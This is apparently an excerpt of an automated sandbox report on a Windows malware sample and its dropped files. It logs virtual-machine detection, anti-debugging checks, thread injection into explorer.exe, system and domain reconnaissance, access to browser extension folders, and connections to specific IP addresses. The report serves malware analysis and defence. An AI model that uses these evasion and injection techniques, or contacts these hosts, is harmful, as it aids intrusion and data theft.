                  Source: C:\Users\user\Desktop\v173TV3V11.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_16-890
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
                  Source: C:\Users\user\Desktop\v173TV3V11.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
                  Source: C:\Users\user\Desktop\v173TV3V11.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhAPI/Special instruction interceptor: Address: 7FFE2220E814
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhAPI/Special instruction interceptor: Address: 7FFE2220D584
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
                  Source: C:\Users\user\AppData\Roaming\vejhhuhAPI/Special instruction interceptor: Address: 7FFE2220E814
                  Source: C:\Users\user\AppData\Roaming\vejhhuhAPI/Special instruction interceptor: Address: 7FFE2220D584
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_034A1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_034A1016
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 479Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2621Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 681Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 3816
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3298
                  Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 5380
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5307
                  Source: C:\Windows\explorer.exe TID: 7052Thread sleep count: 479 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 2504Thread sleep count: 2621 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 2504Thread sleep time: -262100s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6984Thread sleep count: 681 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6984Thread sleep time: -68100s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 4092Thread sleep count: 319 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 2196Thread sleep count: 281 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5900Thread sleep count: 257 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 5084Thread sleep count: 118 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 3544Thread sleep count: 142 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 3704Thread sleep count: 117 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 2504Thread sleep count: 295 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 3284Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 1784Thread sleep count: 3816 > 30
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 1784Thread sleep time: -3816000s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 2112Thread sleep count: 3298 > 30
                  Source: C:\Windows\explorer.exe TID: 2112Thread sleep time: -3298000s >= -30000s
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 3960Thread sleep count: 5380 > 30
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 3960Thread sleep time: -5380000s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 5272Thread sleep count: 5307 > 30
                  Source: C:\Windows\explorer.exe TID: 5272Thread sleep time: -5307000s >= -30000s
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domain
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domainJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00419FC0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00515fech], 11h and CTI: jne 0041A187h0_2_00419FC0
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_00419FC0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00515fech], 11h and CTI: jne 0041A187h5_2_00419FC0
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_00419D70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00515fech], 11h and CTI: jne 00419F37h6_2_00419D70
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_00419D70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00515fech], 11h and CTI: jne 00419F37h8_2_00419D70
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AFFB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,9_2_00007FF763AFFB4C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00802B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,11_2_00802B15
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00801D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,11_2_00801D4A
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00803ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,11_2_00803ED9
                  Source: C:\Windows\explorer.exeCode function: 14_2_00C830A8 FindFirstFileW,FindNextFileW,FindClose,14_2_00C830A8
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00806512 GetSystemInfo,11_2_00806512
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: explorer.exe, 00000001.00000000.1764358626.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: explorer.exe, 00000001.00000000.1763817484.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                  Source: explorer.exe, 00000001.00000000.1764358626.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: explorer.exe, 00000001.00000000.1760642789.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000001.00000000.1764358626.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                  Source: 451E.exe, 00000009.00000003.3322167908.000002E002E41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77104-AAOEM\r\nOriginal Install Date: 03/10/2023, 09:57:18\r\nSystem Boot Time: 24/09/2023, 13:00:03\r\nSystem Manufacturer: 65VTFHAz2bVBkhR\r\nSystem Model: awcHydbR\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: ED6RW 2PPTY, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'848 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'115 MB\r\nVirtual Memory: In Use: 1'076 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: 8OhXz\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.4\r\n [02]: fe80::29b9:a951:1791:4eb3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n3273417056311350223273417056\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>Class 3 Public Primary Certification Authority","from":"1997-04-17 00:00:00 000","expire":"2016-10-24 23:59:59 000","obj_id":"1.2.840.113549.1.1.1"},{"name":"Microsoft Windows Hardware Compatibility","subject":"OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Windows Hardware Compatibility Intermediate CA, OU=Microsoft Corporation, CN=Microsoft Windows Hardware Compatibility","issuer":"OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root A
                  Source: explorer.exe, 00000001.00000000.1763817484.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                  Source: explorer.exe, 00000001.00000000.1763817484.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763817484.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2707106638.00000000009FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: explorer.exe, 0000000B.00000002.2707106638.00000000009FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR6B
                  Source: explorer.exe, 00000001.00000000.1764358626.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                  Source: 451E.exe, 00000009.00000003.3322030879.000002E002E3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fo & echo 3273417056311350223273417056\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77104-AAOEM\r\nOriginal Install Date: 03/10/2023, 09:57:18\r\nSystem Boot Time: 24/09/2023, 13:00:03\r\nSystem Manufacturer: 65VTFHAz2bVBkhR\r\nSystem Model: awcHydbR\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: ED6RW 2PPTY, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'848 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'115 MB\r\nVirtual Memory: In Use: 1'076 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: 8OhXz\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.4\r\n [02]: fe80::29b9:a951:1791:4eb3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n3273417056311350223273417056\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>Class 3 Public Primary Certification Authority","from":"1997-04-17 00:00:00 000","expire":"2016-10-24 23:59:59 000","obj_id":"1.2.840.113549.1.1.1"},{"name":"Microsoft Windows Hardware Compatibility","subject":"OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Windows Hardware Compatibility Intermediate CA, OU=Microsoft Corporation, CN=Microsoft Windows Hardware Compatibility","issuer":"OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root A
                  Source: explorer.exe, 00000001.00000000.1763817484.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                  Source: explorer.exe, 00000001.00000000.1760642789.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: ROUTE.EXE, 00000022.00000002.3032501499.00000210BAC49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: explorer.exe, 00000001.00000000.1760642789.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\Desktop\v173TV3V11.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\v173TV3V11.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vejhhuhProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_034A1B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,16_2_034A1B17
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_034A1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_034A1016
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AF78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,9_2_00007FF763AF78EC
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_006B092B mov eax, dword ptr fs:[00000030h]0_2_006B092B
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_006B0D90 mov eax, dword ptr fs:[00000030h]0_2_006B0D90
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_009110B3 push dword ptr fs:[00000030h]0_2_009110B3
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_006C092B mov eax, dword ptr fs:[00000030h]5_2_006C092B
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_006C0D90 mov eax, dword ptr fs:[00000030h]5_2_006C0D90
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_006F049B push dword ptr fs:[00000030h]5_2_006F049B
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_006B092B mov eax, dword ptr fs:[00000030h]6_2_006B092B
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_006B0D90 mov eax, dword ptr fs:[00000030h]6_2_006B0D90
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_008B0FC4 push dword ptr fs:[00000030h]6_2_008B0FC4
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_0067092B mov eax, dword ptr fs:[00000030h]8_2_0067092B
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_00670D90 mov eax, dword ptr fs:[00000030h]8_2_00670D90
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_0076011C push dword ptr fs:[00000030h]8_2_0076011C
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AF2654 GetProcessHeap,RtlReAllocateHeap,9_2_00007FF763AF2654

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeFile created: vejhhuh.1.drJump to dropped file
                  Source: C:\Windows\explorer.exeNetwork Connect: 190.219.117.240 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 201.212.52.197 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.162 443Jump to behavior
                  Source: C:\Users\user\Desktop\v173TV3V11.exeThread created: C:\Windows\explorer.exe EIP: 88019A8Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhThread created: unknown EIP: 7D919A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeThread created: unknown EIP: 9071970Jump to behavior
